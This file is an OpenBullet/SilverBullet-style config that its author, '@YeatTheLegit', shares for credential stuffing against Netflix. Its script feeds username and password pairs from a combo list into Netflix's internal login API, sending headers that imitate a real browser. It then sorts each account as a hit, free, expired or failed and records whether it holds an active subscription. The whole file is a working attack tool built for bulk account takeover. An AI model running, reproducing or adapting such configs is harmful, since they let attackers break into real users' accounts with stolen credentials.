[SETTINGS]
{
  "Name": "Netflix config by @YeatTheLegit",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2024-07-14T00:09:47.25438+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@YeatTheLegit | t.me/yeatgen",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "@YeatTheLegit",
      "VariableName": "@YeatTheLegit",
      "Id": 1784393334
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Netflix @YeatTheLegit",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION URLEncode "<USER>" -> VAR "US" 

REQUEST GET "https://www.netflix.com" 
  
  HEADER "Host: www.netflix.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua: \"Google Chrome\";v=\"119\", \"Chromium\";v=\"119\", \"Not?A_Brand\";v=\"24\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-ch-ua-platform-version: \"10.0.0\"" 
  HEADER "sec-ch-ua-model: \"\"" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" 
  HEADER "Sec-Fetch-Site: none" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Accept-Language: es-419,es;q=0.9,en;q=0.8" 
  HEADER "Accept-Encoding: gzip, deflate" 

PARSE "<SOURCE>" LR "\"authURL\":\"" "\"" EncodeOutput=TRUE -> VAR "AuthURL1" 

FUNCTION URLDecode "<AuthURL1>" -> VAR "AuthURL" 

FUNCTION Unescape "<AuthURL>" -> VAR "AuthURL" 

FUNCTION URLEncode "<AuthURL>" -> VAR "AuthURL" 

PARSE "<SOURCE>" LR "data\":{\"esn\":\"" "\",\"" -> VAR "Esn" 

REQUEST POST "https://www.netflix.com/api/aui/pathEvaluator/web/%5E2.0.0?landingURL=%2Feg%2F&landingOrigin=https%3A%2F%2Fwww.netflix.com&inapp=false&languages=ar-EG&netflixClientPlatform=browser&supportCategory=innovation&method=call&callPath=%5B%22aui%22%2C%22moneyball%22%2C%22next%22%5D&falcor_server=0.1.0" 
  CONTENT "authURL=<AuthURL>&tracingId=v758ce024&tracingGroupId=www.netflix.com&esn=<Esn>&param=%7B%22flow%22%3A%22signupSimplicity%22%2C%22mode%22%3A%22welcome%22%2C%22action%22%3A%22saveAction%22%2C%22fields%22%3A%7B%22email%22%3A%7B%22value%22%3A%22<US>%22%7D%7D%7D" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "origin: https://www.netflix.com" 
  HEADER "pragma: no-cache" 
  HEADER "referer: https://www.netflix.com/eg/" 
  HEADER "sec-ch-ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 
  HEADER "x-netflix.browsername: Chrome" 
  HEADER "x-netflix.browserversion: 109" 
  HEADER "x-netflix.client.request.name: ui/xhrUnclassified" 
  HEADER "x-netflix.clienttype: akira" 
  HEADER "x-netflix.esnprefix: NFCDCH-02-" 
  HEADER "x-netflix.nq.stack: prod" 
  HEADER "x-netflix.osfullname: Windows 10" 
  HEADER "x-netflix.osname: Windows" 
  HEADER "x-netflix.osversion: 10.0" 
  HEADER "x-netflix.request.routing: {\"path\":\"/nq/aui/endpoint/%5E1.0.0-web/pathEvaluator\",\"control_tag\":\"auinqweb\"}" 
  HEADER "x-netflix.uiversion: v758ce024" 

REQUEST POST "https://www.netflix.com/api/aui/pathEvaluator/web/%5E2.0.0?landingURL=%2Fsignup%2Fpassword&landingOrigin=https%3A%2F%2Fwww.netflix.com&inapp=false&isConsumptionOnly=false&logConsumptionOnly=false&languages=ar-EG&netflixClientPlatform=browser&supportCategory=innovation&method=call&callPath=%5B%22aui%22%2C%22moneyball%22%2C%22next%22%5D&falcor_server=0.1.0" 
  CONTENT "allocations=%7B%2253701%22%3A5%2C%2253818%22%3A2%7D&tracingId=v758ce024&tracingGroupId=www.netflix.com&esn=<Esn>&authURL=<AuthURL>&param=%7B%22flow%22%3A%22signupSimplicity%22%2C%22mode%22%3A%22passwordOnly%22%2C%22action%22%3A%22loginAction%22%2C%22fields%22%3A%7B%22password%22%3A%7B%22value%22%3A%22<PASS>%22%7D%2C%22email%22%3A%7B%22value%22%3A%22<US>%22%7D%2C%22previousMode%22%3A%22%22%7D%7D" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "origin: https://www.netflix.com" 
  HEADER "pragma: no-cache" 
  HEADER "referer: https://www.netflix.com/signup/password?locale=ar-EG" 
  HEADER "sec-ch-ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 
  HEADER "x-netflix.browsername: Chrome" 
  HEADER "x-netflix.browserversion: 109" 
  HEADER "x-netflix.client.request.name: ui/xhrUnclassified" 
  HEADER "x-netflix.clienttype: akira" 
  HEADER "x-netflix.esnprefix: NFCDCH-02-" 
  HEADER "x-netflix.nq.stack: prod" 
  HEADER "x-netflix.osfullname: Windows 10" 
  HEADER "x-netflix.osname: Windows" 
  HEADER "x-netflix.osversion: 10.0" 
  HEADER "x-netflix.request.routing: {\"path\":\"/nq/aui/endpoint/%5E1.0.0-web/pathEvaluator\",\"control_tag\":\"auinqweb\"}" 
  HEADER "x-netflix.uiversion: v758ce024" 

IF "<SOURCE>" CONTAINS "CURRENT_MEMBER"

FUNCTION Constant "True" -> CAP "Has Subscription On Netflix" 

ELSE

FUNCTION Constant "False" -> CAP "Has Subscription On Netflix" 

ENDIF

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "value\":\"CURRENT_MEMBER" 
  KEYCHAIN Custom "FREE" OR 
    KEY "value\":\"NEVER_MEMBER\"" 
  KEYCHAIN Failure OR 
    KEY "value\":\"NON_REGISTERED_MEMBER" 
    KEY "value\":\"email_is_empty" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "value\":\"FORMER_MEMBER" 
    KEY "value\":\"Your membership is paused." 

SET CAP "CONFIG BY" "@YeatTheLegit | t.me/yeatgen"

